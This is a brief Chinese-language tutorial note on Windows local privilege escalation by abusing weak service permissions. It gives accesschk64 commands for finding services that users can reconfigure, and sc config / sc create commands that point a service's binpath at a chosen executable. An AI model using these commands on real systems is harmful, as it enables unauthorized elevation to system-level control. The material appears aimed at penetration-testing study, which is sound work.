binpath本地提权
binpath本地提权是利用了服务权限不正确。在youtube上传了一个演示视频
参考资料:https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html
上一篇提到过,sc.exe是一个管理windows服务的命令。
检查服务配置的权限是否不安全
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
“SERVICE_CHANGE_CONFIG” permission.
任何用户都有修改配置的权限
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -uwcqv 用户名 *
查看用户可以有权修改哪些服务。
修改服务配置
使用sc命令
下面命令的意思是配置一个exe,作为服务启动。sc config NewService binpath= "ntsd -d c:\windows\system32\NewServ.exe"
sc create whale2dll binpath= “C:\Program Files\DLL Hijack Service\dllhijackservice.exe” type= own
1 | |